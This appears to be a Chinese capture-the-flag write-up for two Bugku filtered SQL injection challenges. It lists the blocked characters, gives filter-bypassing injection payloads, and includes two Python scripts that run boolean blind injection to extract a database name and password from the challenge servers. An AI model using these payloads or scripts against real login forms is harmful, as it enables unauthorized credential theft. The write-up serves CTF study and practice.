Bugku过滤注入题目分析

一道是login3这道题,一道是sql2的题,题目很像,就放一块写wp吧

思路

这两题很像,都有三个相似点:

1.使用了过滤的字符会提示不合法字符
2.用户名错误会显示用户名错误或不存在
3.用户名正确会显示密码错误(不知道密码)

解题思路:

1.尝试字符是否合法,得出那些字符被过滤了
2.在username的框中进行注入;根据页面显示
  用户名错误还是显示密码错误进行布尔盲注

做这两题也都有猜测成分,因为information不能用,则猜测表中应该只有一条数据,字段名为用户名和密码,登录时只有用户名和密码都正确才能进入(当然用户名绕过时只需密码正确即可);猜测密码的字段名时,查看了网页源代码,找到密码输入框的name,当做密码字段名,尝试发现成功了。

sql2:

过滤:

空格
or for information
||
and
#
--
union
,

由于注释被过滤了,那就尝试使用单引号进行闭合(发现成功,说明为单引号注入)

构造

1'^'1'='1

由于SQL比较时会进行数据类型转换,则如果

select ... where username=0;

会查询成功,那么此时会显示密码错误

则更改

1'^xxx='1

即可进行注入,这里xxx为payload

login3

被过滤:

and
like
空格
=
,
for information
union

则构造

1'or(1<>2)#

可绕过用户名,显示密码错误

此时运用

1'or(xxx<>2)#

即可进行盲注,这里xxx为payload

脚本

sql2

import requests

name = ''
url = 'http://123.206.87.240:8007/web2/login.php'
for position in range(1, 4):
    for num in range(32, 127):
        data = {'uname': "1'^(ascii(substr(database()from(%d)))=%d)='1" % (position, num), 'passwd': 'asdf'}
        req = requests.post(url, data)
        if 'password error' in req.text:
            name += chr(num)
            break
print(name)
print('over')

for i in range(50):
    data = {'uname': "1'^(length(passwd)=%d)='1" % (i), 'passwd': 'asdf'}
    req = requests.post(url, data)
    if 'password error' in req.text:
        print(i)
        break
print('over')

passwd = ''
for position in range(1, 33):
    for num in range(32, 127):
        data = {'uname': "1'^(ascii(substr((passwd)from(%d)))=%d)='1" % (position, num), 'passwd': 'asdf'}
        req = requests.post(url, data)
        if 'password error' in req.text:
            passwd += chr(num)
            print(passwd)
            break
print(passwd)
print('over')

login3

import requests

url = 'http://123.206.31.85:49167/index.php'

for num in range(1,20):
    data = {'username':"1'or(length(database())<>%d)#"%num,'password':'asdf'}
    req = requests.post(url,data)
    if 'exist' in req.text:
        print(num)
        break
print('over')

name = ''
for position in range(1,9):
    for i in range(32,127):
        data = {'username':"1'or(ascii(substr(database()from(%d)))<>%d)#"%(position,i),'password':'asdf'}
        req = requests.post(url,data)
        if 'exist' in req.text:
            name += chr(i)
            print(chr(i),end='')
            break

print('\nover')

for i in range(1,50):
    data = {'username':"1'or(length(password)<>%d)#"%i,'password':'asdf'}
    req = requests.post(url,data)
    if 'exist' in req.text:
        print(i)
        break
print('over')

password = ''
for position in range(1,33):
    for i in range(32,127):
        data = {'username':"1'or(ascii(substr((password)from(%d)))<>%d)#"%(position,i),'password':'asdf'}
        req = requests.post(url,data)
        if 'exist' in req.text:
            password += chr(i)
            print(chr(i),end='')
            break

print('\nover')